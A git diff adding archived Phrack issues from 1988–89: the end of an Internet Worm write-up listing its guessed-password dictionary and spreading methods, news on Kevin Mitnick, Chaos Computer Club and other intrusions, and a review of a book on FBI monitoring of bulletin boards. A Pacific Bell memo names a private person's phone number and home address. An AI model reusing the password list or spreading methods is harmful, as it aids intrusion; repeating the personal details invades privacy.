+brenda          flakes       light       rascal        unicorn
+brian           float        lisa        really        unknown
+bridget         flower       louis       rebecca       urchin
+broadway        flowers      lynne       remote        utility
+bumbling        foolproof    macintosh   rick          vasant
+burgess         football     mack        ripple        vertigo
+campanile       foresight    maggot      robotics      vicky
+cantor          format       magic       rochester     village
+cardinal        forsythe     malcolm     rolex         virginia
+carmen          fourier      mark        romano        warren
+carolina        fred         markus      ronald        water
+caroline        friend       marty       rosebud       weenie
+cascades        frighten     marvin      rosemary      whatnot
+castle          fun          master      roses         whiting
+cat             fungible     maurice     ruben         whitney
+cayuga          gabriel      mellon      rules         will
+celtics         gardner      merlin      ruth          william
+cerulean        garfield     mets        sal           williamsburg
+change          gauss        michael     saxon         willie
+charles         george       michelle    scamper       winston
+charming        gertrude     mike        scheme        wisconsin
+charon          ginger       minimum     scott         wizard
+chester         glacier      minsky      scotty        wombat
+cigar           gnu          moguls      secret        woodwind
+classic         golfer       moose       sensor        wormwood
+clusters        gorgeous     morley      serenity      yaco
+coffee          gorges       mozart      sharks        yang
+coke            gosling      nancy       sharon        yellowstone
+collins         gouge        napoleon    sheffield     yosemite
+commrades       graham       nepenthe    sheldon       zap
+computer        gryphon      ness        shiva         zimmerman
+condo           guest        network     shivers
+cookie          guitar       newton      shuttle
+cooper          gumption     next        signature
+
+
+When everything else fails, it opens /usr/dict/words and tries every word in
+the dictionary.  It is pretty successful in finding passwords, as most people
+don't choose them very well.  Once it gets into someone's account, it looks for
+a .rhosts file and does an 'rsh' and/or 'rexec' to another host, it sucks over
+the necessary files into /usr/tmp and runs /usr/tmp/sh to start all over again.
+
+Between these three methods of attack (sendmail, fingerd, .rhosts) it was able
+to spread very quickly.
+
+
+The Worm Itself:
+
+The 'sh' program is the actual worm.  When it starts up it clobbers its argv
+array so a 'ps' will not show its name.  It opens all its necessary files, then
+unlinks (deletes) them so they can't be found (since it has them open, however,
+it can still access the contents).  It then tries to infect as many other hosts
+as possible - when it sucessfully connects to one host, it forks a child to
+continue the infection while the parent keeps on trying new hosts.
+
+One of the things it does before it attacks a host is connect to the telnet
+port and immediately close it.  Thus, "telnetd: ttloop: peer died" in
+/usr/adm/messages means the worm attempted an attack.
+
+The worm's role in life is to reproduce - nothing more.  To do that it needs to
+find other hosts.  It does a 'netstat -r -n' to find local routes to other
+hosts & networks, looks in /etc/hosts, and uses the yellow pages distributed
+hosts file if it's available.  Any time it finds a host, it tries to infect it
+through one of the three methods, see above.  Once it finds a local network
+(like 129.63.nn.nn for ulowell) it sequentially tries every address in that
+range.
+
+If the system crashes or is rebooted, most system boot procedures clear /tmp
+and /usr/tmp as a matter of course, erasing any evidence.  However, sendmail
+log files show mail coming in from user /dev/null for user /bin/sed, which is a
+tipoff that the worm entered.
+
+Each time the worm is started, there is a 1/15 chance (it calls random()) that
+it sends a single byte to ernie.berkeley.edu on some magic port, apparently to
+act as some kind of monitoring mechanism.
+
+
+The Crackdown:
+
+Three main 'swat' teams from Berkeley, MIT and Purdue found copies of the VAX
+code (the .o files had all the symbols intact with somewhat meaningful names)
+and disassembled it into about 3000 lines of C.  The BSD development team poked
+fun at the code, even going so far to point out bugs in the code and supplying
+source patches for it!  They have not released the actual source code, however,
+and refuse to do so.  That could change - there are a number of people who want
+to see the code.
+
+Portions of the code appear incomplete, as if the program development was not
+yet finished.  For example, it knows the offset needed to break the BSD
+fingerd, but doesn't know the correct offset for Sun's fingerd (which causes it
+to dump core); it also doesn't erase its tracks as cleverly as it might; and so
+on.
+
+The worm uses a variable called 'pleasequit' but doesn't correctly initialize
+it, so some folks added a module called _worm.o to the C library, which is
+produced from:  int pleasequit = -1; the fact that this value is set to -1 will
+cause it to exit after one iteration.
+
+The close scrutiny of the code also turned up comments on the programmer's
+style.  Verbatim from someone at MIT:
+
+    From disassembling the code, it looks like the programmer is really
+    anally retentive about checking return codes, and, in addition,
+    prefers to use array indexing instead of pointers to walk through
+    arrays.
+
+Anyone who looks at the binary will not see any embedded strings - they are
+XOR'ed with 81 (hex).  That's how the shell commands are imbedded.  The
+"obvious" passwords are stored with their high bit set.
+
+Although it spreads very fast, it is somewhat slowed down by the fact that it
+drives the load average up on the machine - this is due to all the encryptions
+going on, and the large number of incoming worms from other machines.
+
+[Initially, the fastest defense against the worm is is to create a directory
+called /usr/tmp/sh.  The script that creates /usr/tmp/sh from one of the .o
+files checks to see if /usr/tmp/sh exists, but not to see if it's a directory.
+This fix is known as 'the condom'.]
+
+
+Now What?
+
+Most Internet systems running 4.3BSD or SunOS have installed the necessary
+patches to close the holes and have rejoined the Internet.  As you would
+expect, there is a renewed interest in system/network security, finding and
+plugging holes, and speculation over what will happen to the worm's creator.
+
+If you haven't read or watched the news, various log files have named
+the responsible person as Robert Morris Jr., a 23-year old doctoral student at
+Cornell.  His father is head of the National Computer Security Center, the
+NSA's public effort in computer security, and has lectured widely on security
+aspects of UNIX.
+
+Associates of the student claim the worm was a 'mistake' - that he intended to
+unleash it but it was not supposed to move so quickly or spread so much.  His
+goal was to have a program 'live' within the Internet.  If the reports that he
+intended it to spread slowly are true, then it's possible that the bytes sent
+to ernie.berkeley.edu were intended to monitor the spread of the worm.  Some
+news reports mentioned that he panicked when, via some "monitoring mechanism"
+he saw how fast it had propagated.
+
+A source inside DEC reports that although the worm didn't make much progress
+there, it was sighted on several machines that wouldn't be on its normal
+propagation path, i.e. not gateways and not on the same subnet.  These machines
+are not reachable from the outside.  Morris was a summer intern at DEC in '87.
+He might have included names or addresses he remembered as targets for
+infesting hidden internal networks.  Most of the DEC machines in question
+belong to the group he worked in.
+
+The final word has not been written...
+                                 ...it will be interesting to see what happens.
+_______________________________________________________________________________
diff --git a/phrack22/9.txt b/phrack22/9.txt
new file mode 100644
index 0000000..840187b
--- /dev/null
+++ b/phrack22/9.txt
@@ -0,0 +1,457 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 22, File 9 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXII/Part 1                PWN
+            PWN                                                 PWN
+            PWN           Created by Knight Lightning           PWN
+            PWN                                                 PWN
+            PWN              Written and Edited by              PWN
+            PWN         Knight Lightning and Taran King         PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+What Is Wrong With This Issue?                                     Introduction
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+There is a distinct difference in this issue of Phrack World News, which may be
+attributed to the unfortunate final outcome of my self-enforced exile from the
+mainstream modem community.  In the "prime" days of PWN, many of you may have
+enjoyed the numerous "bust" stories or the ever suspenseful undercover
+exposures of security trying to end the hacking community.  Those days are over
+and have been for quite some time.
+
+To put it simply, I do not have the economic resources to legally run around on
+the nation's bulletin boards or to go and gather information on suspected
+security agents.  Perhaps this is for the better.  However, I have a feeling
+that most people disagree and rather enjoyed those types of stories.  Its no
+longer in my hands.  Its obvious that I need help with such a task and that
+help can only come from you, the community itself.
+
+I am easily reached... I am on Bitnet.  Even people who own MCI Mail, GTE
+Telemail, or Compuserve accounts can send me mail thanks to experimental
+gateways.  People on ARPAnet, Bitnet, or UUCP should have no problems
+whatsoever.  So please go ahead and drop me a line, I would be interested in
+what you have to say.
+
+:Knight Lightning (C483307@UMCVMB.BITNET)
+
+Much of this issue of Phrack World News comes from Internet news sources such
+as the Risks, Virus-L, and Telecom Digests.  Some news stories come from other
+magazines and newspapers, and a few come from Chamas, the online Bitnet
+bulletin board run by Terra of the Chaos Computer Club (CCC).  A very special
+thanks goes to The Noid of 314 for all his help in putting this issue together.
+
+A couple last things to mention... the upcoming files on hackers abroad have
+taken a slightly different direction.  There will be news on foreign hacker
+activities presented in PWN (starting this issue), but actual files on the
+subject will be presented by the hackers themselves so watch for them.
+_______________________________________________________________________________
+
+Who Is Clifford Stoll?                                    Pre-Issue Information
+~~~~~~~~~~~~~~~~~~~~~~
+This issue of Phrack World News features many stories about the Internet Worm
+and other hacking incidents on the Internet.  One person who plays a prominent
+role in all of these stories is Clifford Stoll, a virtual unknown prior to
+these incidents.  However, some checking into other related incidents turned up
+some very interesting information about Cliff Stoll.
+
+Clifford Stoll, age 37 (as of May 2, 1988) was a system's manager at
+California's Lawrence Berkeley Laboratory.  He might still retain this
+position.  Stoll is the master sleuth who tracked down the West German hacker,
+Mathias Speer, who infiltrated the Internet via the Space Physics Analysis
+Network (SPAN).  The game of "cat and mouse" lasted for 10 months until
+Clifford Stoll eventually set up an elaborate sting operation using files
+marked "SDI Network Project" (Star Wars) to get Mathias to stay online long
+enough to trace him back to Hannover, FRG.
+
+I was able to contact Clifford Stoll at LBL (which maintains a node on Bitnet).
+However, outside of a confirmation of his presence, I was never able to really
+converse with him.  Recently he has been seen on DOCKMASTER, a node on ARPAnet
+that is operated by the National Security Agency (NSA).  He has also been seen
+as having accounts on many other nodes all across Internet.  Either he has come
+a long way or was just not as well known prior to the Internet Worm incident.
+
+For more information see;
+
+        Time Magazine, May 2, 1988 and/or New Scientist, April 28, 1988
+        -------------                     -------------
+Thought you might be interested to know about it.
+
+:Knight Lightning
+_______________________________________________________________________________
+
+Dangerous Hacker Is Captured                                 PWN Special Report
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Last issue, I re-presented some memos from Pacific Bell Security.  The first
+of which featured "Kevin Hacker," who I now reveal as Kevin Mitnick.  The
+original intent was to protect the anonyimity of the said hacker, but now that
+he has come upon public fame there is no longer a reason to keep his identity a
+secret.
+
+The following memo from Pacific Bell Security was originally seen in Phrack
+World News Issue XXI/1.  This version leaves the legitimate information intact.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+On May 14, 1987, Electronic Operations received a court order directing Pacific
+Bell to place traps on the telephone numbers assigned to a company known as
+"Santa Cruz Operations."  The court order was issued in order to identify the
+telephone number being used by an individual who was illegally entering Santa
+Cruz Operations' computer and stealing information.
+
+On May 28, 1987, a telephone number was identified five separate times making
+illegal entry into Santa Cruz Operations' computer.  The originating telephone
+number was 805-495-6191, which is listed to Bonnie Vitello, 1378 E. Hillcrest
+Drive, Apt. 404, Thousand Oaks, California.
+
+On June 3, 1987, a search warrant was served at 1378 E. Hillcrest Drive, Apt
+404, Thousand Oaks, California.  The residents of the apartment, who were not
+at home, were identified as Bonnie Vitello, a programmer for General Telephone,
+and Kevin Mitnick, a known computer hacker.  Found inside the apartment were
+three computers, numerous floppy disks and a number of General Telephone
+computer manuals.
+
+Kevin Mitnick was arrested several years ago for hacking Pacific Bell, UCLA and
+Hughes Aircraft Company computers.  Mitnick was a minor at the time of his
+arrest.  Kevin Mitnick was recently arrested for compromising the data base of
+Santa Cruz Operations.
+
+The floppy disks that were seized pursuant to the search warrant revealed
+Mitnick's involvment in compromising the Pacific Bell UNIX operation systems
+and other data bases.  The disks documented the following:
+
+  o  Mitnick's compromise of all Southern California SCC/ESAC computers.  On
+     file were the names, log-ins, passwords, and home telephone numbers for
+     Northern and Southern ESAC employees.
+
+  o  The dial-up numbers and circuit identification documents for SCC computers
+     and Data Kits.
+
+  o  The commands for testing and seizing trunk testing lines and channels.
+
+  o  The commands and log-ins for COSMOS wire centers for Northern and Southern
+     California.
+
+  o  The commands for line monitoring and the seizure of dial tone.
+
+  o  References to the impersonation of Southern California Security Agents and
+     ESAC employees to obtain information.
+
+  o  The commands for placing terminating and originating traps.
+
+  o  The addresses of Pacific Bell locations and the Electronic Door Lock
+     access codes for the following Southern California central offices ELSG12,
+     LSAN06, LSAN12, LSAN15, LSAN23, LSAN56, AVLN11, HLWD01, HWTH01, IGWD01,
+     LOMT11, AND SNPD01.
+
+  o  Inter-company Electronic Mail detailing new login/password procedures and
+     safeguards.
+
+  o  The work sheet of an UNIX encryption reader hacker file.  If successful,
+     this program could break into any UNIX system at will.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Ex-Computer Whiz Kid Held On New Fraud Counts                 December 16, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Kim Murphy (Los Angeles Times)(Edited For This Presentation)
+
+Kevin Mitnick was 17 when he first cracked Pacific Bell's computer system,
+secretly channeling his computer through a pay phone to alter telephone bills,
+penetrate other computers and steal $200,000 worth of data from a San Francisco
+corporation.  A Juvenile Court judge at the time sentenced Mitnick to six
+months in a youth facility.
+
+After his release, his probation officer found that her phone had been
+disconnected and the phone company had no record of it.  A judge's credit
+record at TRW Inc. was inexplicably altered.  Police computer files on the case
+were accessed from outside... Mitnick fled to Israel.  Upon his return, there
+were new charges filed in Santa Cruz, accusing Mitnick of stealing software
+under development by Microport Systems, and federal prosecutors have a judgment
+showing Mitnick was convicted on the charge.  There is, however, no record of
+the conviction in Sant Cruz's computer files.
+
+On Thursday, Mitnick, now 25, was charged in two new criminal complaints
+accusing him of causing $4 million damage to a DEC computer, stealing a highly
+secret computer security system and gaining access to unauthorized MCI
+long-distance codes through university computers in Los Angeles, California,
+and England.
+
+A United States Magistrate took the unusual step of ordering "Mitnic    k] held
+without bail, ruling that when armed with a keyboard he posed a danger to the
+community.' "This thing is so massive, we're just running around trying to
+figure out what he did," said the prosecutor, an Assistant United States
+Attorney.  "This person, we believe, is very, very dangerous, and he needs to
+be detained and kept away from a computer."
+
+Los Angeles Police Department and FBI Investigators say they are only now
+beginning to put together a picture of Mitnick and his alleged high-tech
+escapades.  "He's several levels above what you would characterize as a
+computer hacker," said Detective James K. Black, head of the Los Angeles Police
+Department's computer crime unit.  "He started out with a real driving
+curiosity for computers that went beyond personal computers... He grew with the
+technology."
+
+Mitnick is to be arraigned on two counts of computer fraud.  The case is
+believed to be the first in the nation under a federal law that makes it a
+crime to gain access to an interstate computer network for criminal purposes.
+Federal prosecutors also obtained a court order restricting Mitnick's telephone
+calls from jail, fearing he might gain access to a computer over the phone
+lines.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Dangerous Keyboard Artist                                     December 20, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~
+LOS ANGELES (UPI) - In a rare ruling, a convicted computer hacker was ordered
+held without bail Thursday on new charges that he gained illegal access to
+secret computer information of Leeds University in England and Digital
+Equipment Corportation.
+
+Kevin David Mitnick, age 25, of Panorama City, is named in two separate
+criminal complaints charging him with computer fraud.  Assistant United States
+Attorney, Leon Weidman said it is unusual to seek detention in such cases, but
+he considers Mitnick 'very very dangerous' and someone who 'needs to be kept
+away from computers.'
+
+United States Magistrate Venetta Tasnuopulos granted the no-bail order after
+Weidman told her that since 1982, Mitnick had also accessed the internal
+records of the Los Angeles Police Department, TRW Corporation, and Pacific
+Telephone.
+
+"He could call up and get access to the whole world," Weidman said.
+
+Weidman said Mitnick had served six months in juvenile hall for stealing
+computer manuals from a Pacific Telephone office in the San Fernando Valley
+and using a pay phone to destroy $200,000 worth of data in the files of a
+northern California company.
+
+Mitnick later pentrated the files of TRW Corporation and altered the credit
+information of several people, including his probation officer, Weidman said.
+
+He said Mitnick also used a ruse to obtain the name of the police detective
+investigating him for hacking when he was a student at Pierce College.  He
+telephoned the dean at 3 a.m., identified himself as a campus security guard,
+reported a computer burglary in progress and asked for the name of the
+detective investigating past episodes, Weidman said.
+
+The prosecutor said Mitnick also gained access to the police department's
+computer data and has impersonated police officers and judges to gain
+information.
+
+A complaint issued charges Mitnick with using a computer in suburban Calabases
+to gain access to Leeds University computer data in England.  He also allegedly
+altered long-distance phone costs incurred by that activity in order to cover
+his mischief.
+
+A second complaint charges Mitnick with stealing proprietary Digital Equipment
+Corporation software valued at more than $1 million and designed to protect the
+security of its computer data.  Mitnick alledgedly stored the stolen data in a
+University of Southern California computer.
+
+An affidavit filed to support the complaints said unauthorized intrusions into
+the Digital computer have cost the company more than $4 million in computer
+downtime, file rebuilding, and lost employee worktime.
+
+A computer operator at Voluntary Plan Assistance in Calabasas, which handles
+disability claims for private firms, told investigators he allowed his friend
+unauthorized access to the firm's computer.  From that terminal, Mitnick gained
+access to Digital's facilities in the United States and abroad, the affidavit
+said.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Kevin Mitnick's fate is in the hand's of the court now, but only time will tell
+what is to happen to this dangerously awesome computer hacker.
+_______________________________________________________________________________
+
+Trojan Horse Threat Succeeds                                  February 10, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+During the week prior to February 10, 1988, the Chaos Computer Club of West
+Berlin announced that they were going to trigger trojan horses they'd
+previously planted on various computers in the Space Physics Analysis Network
+(SPAN).  Presumably, the reason for triggering the trojan horses was to throw
+the network into disarray; if so, the threat did, unfortunately, with the help
+of numerous fifth-columnists within SPAN, succeeded.  Before anybody within
+SPAN replies by saying something to the effect of "Nonsense, they didn't
+succeed in triggering any trojan horses."  However the THREAT succeeded.
+
+That's right, for the last week SPAN hasn't been functioning very well as a
+network.  All too many of the machines in it have cut off network
+communications (or at least lost much of their connectivity), specifically in
+order to avoid the possibility that the trojan horses would be triggered (the
+fifth-columnists who were referred above are those system and network managers
+who were thrown into panic by the threat).  This is rather amazing (not to
+mention appalling) for a number of reasons:
+
+    1)  By reducing networking activities, SPAN demonstrated that the CCC DOES
+        have the power to disrupt the network (even if there aren't really any
+        trojan horses out there);
+    2)  Since the break-ins that would have permitted the installation of
+        trojan horses, there have been a VMS release (v4.6) that entails
+        replacement of ALL DEC-supplied images.  Installation of the new
+        version of VMS provided a perfect opportunity to purge one's system of
+        any trojan horses.
+    3)  In addition to giving CCC's claims credibility, SPAN's response to the
+        threat seems a bit foolish since it leaves open the question "What
+        happens if the CCC activates trojan horses without first holding a
+        press conference?"
+
+Hiding from the problem doesn't help in any way, it merely makes SPAN (and
+NASA) look foolish.
+
+                            Information Provided By
+                     Carl J. Ludick and Frederick M. Korz
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+This is a perfect example of a self-fulfilling phrophecy.  The Chaos Computer
+Club's announcement that they were going to trigger their Trojan horses in the
+Space Physics Analysis Network (SPAN) illustrates the potent power of rumor --
+backed by plausibility.  They didn't have to do anything.  The sky didn't have
+to fall.  Nervous managers did the damage for the CCC because they felt the
+announcement/threat plausible.  The prophecy was fulfilled.
+
+                       "And the more the power to them!"
+
+:Knight Lightning
+_______________________________________________________________________________
+
+TCA Pushes For Privacy On Corporate Networks                   October 19, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Kathy Chin Leong  (Computerworld Magazine)
+
+SAN DIEGO -- As more and more confidential data winds its way across computer
+networks, users are expressing alarm over how much of that information is safe
+from subsidiaries of the Bell operating companies (BOCs) and long-distance
+firms providing transmission services.
+
+This fear has prompted the Tele-Communications Association (TCA) and large
+network users to appeal to the Federal Communications Commission to clarify
+exactly what network data is available to these vendors.
+
+Users with large networks, such as banks and insurance companies, are concerned
+that published details even of where a circuit is routed can be misused.  "We
+don't what someone like AT&T to use our information and then turn around and
+compete against us," said Leland Fong, a network planner at Visa International
+in San Francisco.  Users are demanding that the FCC establish a set of rules
+and regulations so that information is not abused.
+
+At issue is the term "customer proprietary network information" (CPNI), which
+encompasses packet data, address and circuit information and traffic statistics
+on networks.  Under the FCC's Computer Inquiry III rules, long-distance
+carriers and Bell operating companies --- specifically, marketing personnel ---
+can get access to their own customers' CPNI unless users request
+confidentiality.  What his group wants, TCA President Jerry Appleby said, is
+the FCC to clarify exactly what falls under the category of CPNI.
+
+Fong added that users can be at the mercy of the Bell operating companies and
+long-distance vendors if there are no safeguards established.  Customer
+information such as calling patterns can be used by the operating companies for
+thier own competitive advantage.  "At this time, there are no controls over
+CPNI, and the users need to see some action on this," Fong said.
+
+                              Spread The Concern
+
+At a meeting here during the TCA show, TCA officials and the association's
+government liason committee met with AT&T to discuss the issue; the group will
+also voice its concerns to other vendors.
+
+Appleby said the issue should not be of concern just to network managers but to
+the entire company.  Earlier this month, several banks, including Chase
+Manhattan Bank and Security Pacific National Bank, and credit card companies
+met with the FCC to urge it to come up with a standard definition for CPNI,
+Appleby said.
+
+While the customer information is generally confidential, it is available to
+the transmission carrier that is supplying the line.  The data is also
+available to marketing departments of that vendor unless a company asks for
+confidentiality.  Fong said that there is no regulation that prevents a company
+from passing the data along to its subsidiaries.
+_______________________________________________________________________________
+
+Belgian Leader's Mail Reportedly Read By Hacker                October 22, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken from the Los Angeles Times
+
+Brussels (AP) -- Belgian Prime Minister Wilfried Martens on Friday ordered an
+investigation into reports that a computer hacker rummaged through his
+electronic files and those of other Cabinet members.
+
+The newspaper De Standaard reported that a man, using a personal computer, for
+three months viewed Martens' electronic mail and other items, including
+classified information about the killing of a British soldier by the Irish
+Republican Army in Ostend in August.
+
+The newspaper said the man showed one of its reporters this week how he broke
+into the computer, using Martens' password code of nine letters, ciphers and
+punctuation marks.  "What is more, during the demonstration, he ran into
+another 'burglar' ... with whom he briefly conversed" via computer, the
+newspaper said.
+_______________________________________________________________________________
+
+Police Find Hacker Who Broke Into 200 Computers                October 24, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+London (New York Times) - Police said yesterday that they had found and
+questioned a 23-year-old man who used computer networks to break into more than
+200 military, corporate, and university systems in Europe and the United States
+during the past five years.
+
+The man was asked about an alleged attempt to blackmail a computer
+manufacturer, but an official for Scotland Yard said that there was not enough
+evidence to pursue the matter.  He was released.
+
+The man, Edward Austin Singh, who is unemployed, reportedly told the police he
+had been in contact with other computer "hackers" in the United States and West
+Germany who use communications networks to penetrate the security protecting
+computers at military installations.
+
+Singh's motive was simply to prove that it was possible to break into the
+military systems, police said, and apparently he did not attempt espionage.
+
+London police began an investigation after the man approached a computer
+manufacturer.  He allegedly asked the company for $5250 in exchange for telling
+it how he had entered its computer network.
+
+The company paid nothing, and London police tracked the suspect by monitoring
+his phone calls after the firm had told Scotland Yard about the incident.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+University of Surrey Hacker                                   November 10, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+There has been a lot of recent publicity in the U.K. about the arrest of a
+hacker at the University of Surrey.  There were stories about his investigation
+by Scotland Yard's Serious Crimes Squad and by the U.S. Secret Service, and
+much dicussion about the inadequacy of the law relating to network hacking.  At
+this date, he has only been charged with offences relating his unathorised
+(physical) entry to the University buildings.
+
+An interview with the individual, Edward Austin Singh, reveals that his
+techniques were simply ased on a program which tricked users into
+unsuspectingly revealing their passwords.  "I wrote a program that utilized a
+flaw that allowed me to call into the dial-up node.  I always did it by
+phoning, never by the network.  The dial-up node has to have an address as
+well, so I was calling the address itself.  I called the dial-up node via the
+network and did it repeatedly until it connected.  That happened every 30
+seconds.  It allowed me to connect the dial-up node at the same time as a
+legitimate user at random.  I would then emulate the system."
+
+He used to run this program at night, and specialized in breaking into Prime
+computer systems.  "I picked up about 40 passwords and IDs an hour.  We were
+picking up military stuff like that, as well as commercial and academic," he
+claims.  This enabled him to get information from more than 250 systems
+world-wide, and (he claims) in touich with an underground hackers network to
+"access virtually every single computer system which was networked in the US -
+thousands and thousands of them, many of them US Arms manufacturers."
+
+The article states that "Prime Computers have so far declined to comment on his
+approach to them or his alleged penetration of their computer systems, until
+the American Secret Service completes its inquiries."
+
+                     Information Provided By Brian Randell
+_______________________________________________________________________________
diff --git a/phrack23/1.txt b/phrack23/1.txt
new file mode 100644
index 0000000..b04f793
--- /dev/null
+++ b/phrack23/1.txt
@@ -0,0 +1,58 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 23, File 1 of 12
+
+
+                   Phrack Inc. Newsletter Issue XXIII Index
+                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                               January 25, 1989
+
+Greetings once again!  Before we really get into the issue, we here at Phrack
+Inc. would like to address some of the questions and comments we've been
+hearing lately about the last issue of Phrack Inc.
+
+When we heard that people were having trouble using the Unix Password Hacking
+Program, we decided to contact the creator and were given this response:
+
+"My password hacker will compile on anything.  I have had it running on Xenix,
+ Unix System V 3.1 and BSD 4.3.  It sounds as if someone may not know what they
+ are doing.  I will put money on it working well on any flavor of Unix."
+
+Now as far as Red Knight's Unix file and The Mentor's Beginning Hackers Guide,
+we had absolutely no idea that those files had also been submitted to P/HUN
+and were being distributed.  The file on the Internet Worm was a Bitnet release
+that we felt was a good enough piece of information that it should be
+publicized.  Readers may wish to make a note that Volume 5, Number 4 of 2600
+Magazine also has re-released the Internet Worm article and Red Knight's file
+on Hacking Unix.
+
+In this issue, note the final chapter of the Vicious Circle Trilogy as well as
+the beginning of the Future Transcendent Saga, both written and created by
+Knight Lightning.  Look for the third and fourth chapters of the FTSaga in
+Issue 24 of Phrack Inc.
+
+Any writers with unreleased files wishing to submit them to Phrack Inc. may
+send them to us via The Prophet or if you have access to a network that
+interfaces with Bitnet, send them to either of our addresses listed below.
+By the same token, anyone on the Bitnet accessible networks, MCI Mail, or GTE
+Telemail who would like Phrack Inc. delivered to their accounts should contact
+us.
+
+                                       Knight Lightning & Taran King
+                                       (C483307@UMCVMB)   (C488869@UMCVMB)
+_______________________________________________________________________________
+
+Table of Contents:
+
+1.  Phrack Inc. XXIII Index by Knight Lightning & Taran King
+2.  Phrack Prophile XXIII Featuring The Mentor by Taran King
+3.  Subdivisions (Part 3 of The Vicious Circle Trilogy) by Knight Lightning
+4.  Utopia; Chapter One of FTSaga by Knight Lightning
+5.  Foundations On The Horizon; Chapter Two of FTSaga by Knight Lightning
+6.  Future Trancendent Saga Index A from the Bitnet Services Library
+7.  Future Trancendent Saga Index B from the Bitnet Services Library
+8.  Getting Serious About VMS Hacking by VAXBusters International
+9.  Can You Find Out If Your Telephone Is Tapped? by Fred P. Graham (& VaxCat)
+10. Big Brother Online by Thumpr (Special Thanks to Hatchet Molly)
+11-12. Phrack World News XXIII by Knight Lightning
+_______________________________________________________________________________
diff --git a/phrack23/10.txt b/phrack23/10.txt
new file mode 100644
index 0000000..fad7b52
--- /dev/null
+++ b/phrack23/10.txt
@@ -0,0 +1,137 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 23, File 10 of 12
+
+                In The Spirit Of The Vicious Circle Trilogy...
+                             Phrack Inc. Presents
+
+                   *****************************************
+                   ***                                   ***
+                   ***        Big Brother Online         ***
+                   ***                                   ***
+                   ***     by Thumpr Of ChicagoLand      ***
+                   ***                                   ***
+                   ***           June 6, 1988            ***
+                   ***                                   ***
+                   ***  Special Thanks To Hatchet Molly  ***
+                   ***                                   ***
+                   *****************************************
+
+The United States Government is monitoring the message activity on several
+bulletin boards across the country.  This is the claim put forth by Glen L.
+Roberts, author of "The FBI and Your BBS."  The manuscript, published by The
+FBI Project, covers a wide ground of FBI/BBS related topics, but unfortunately
+it discusses none of them in depth.
+
+It begins with a general history of the information gathering activities of the
+FBI.  It seems that that the FBI began collecting massive amounts of
+information on citizens that were involved with "radical political" movements.
+This not begin during the 1960's as one might expect, but rather during the
+1920's!  Since then the FBI has amassed a HUGE amount of information on
+everyday citizens... citizens convicted of no crime other than being active in
+some regard that the FBI considers potentially dangerous.
+
+After discussing the activities of the FBI Roberts jumps into a discussion of
+why FBI snooping on BBS systems is illegal.  He indicates that such snooping
+violates the First, Fourth, and Fifth amendments to the Constitution.  But he
+makes his strongest case when discussing the Electronic Communications Privacy
+Act of 1987.  This act was amended to the Federal Wiretapping Law of 1968 and
+was intended to protect business computer systems from invasion by "hackers."
+But as with all good laws, it was written in such broad language that it can,
+and does, apply to privately owned systems such as Bulletin Boards.  Roberts
+(briefly) discusses how this act can be applied in protecting *your* bulletin
+board from snooping by the Feds.
+
+How to protect your BBS:  Do NOT keep messages for more than 180 days.  Because
+the way the law is written, messages less then 180 days old are afforded more
+protection then older messages.  Therefore, to best protect your system purge,
+archive, or reload your message base about every 150 days or so.  This seems
+silly but will make it harder (more red tape) for the government to issue a
+search warrant and inform the operator/subscriber of the service that a search
+will take place.  Roberts is not clear on this issue, but his message is stated
+emphatically... you will be better protected if you roll over your message base
+sooner.
+
+Perhaps the best way to protect your BBS is to make it a private system.  This
+means that you can not give "instant access" to callers (I know of very few
+underground boards that do this anyway) and you can not allow just anyone to be
+a member of your system.  In other words, even if you make callers wait 24
+hours to be validated before having access you need to make some distinctions
+about who you validate and who you do not.  Your BBS needs to be a PRIVATE
+system and you need to take steps to enforce and proclaim this EXPECTED
+PRIVACY.  One of the ways Roberts suggests doing so is placing a message like
+this in your welcome screen:
+
+     "This BBS is a private system.  Only private citizens who are not
+     involved in government or law enforcement activities are authorized
+     to use it.  The users are not authorized to divulge any information
+     gained from this system to any government agency or employee."
+
+Using this message, or one like it, will make it a criminal offense (under the
+ECPA) for an FBI Agent or other government snoop to use your BBS.
+
+The manuscript concludes with a discussion of how to verify users and what to
+do when you find an FBI agent using your board.  Overall, I found Roberts book
+to be moderately useful.  It really just whetted my appetite for more
+information instead of answering all my questions.  If you would like a copy of
+the book it sells for $5.00 (including postage etc).  Contact;
+
+                                THE FBI PROJECT
+                                   Box 8275
+                             Ann Arbor, MI  48107
+
+Visa/MC orders at (313) 747-7027.  Personally I would use a pseudonym when
+dealing with this organization.  Ask for a catalog with your order and you will
+see the plethora of anti-FBI books this organization publishes.  Undoubtedly
+the FBI would be interested in knowing who is doing business with this place.
+The manuscript, by the way, is about 20 pages long and offers references to
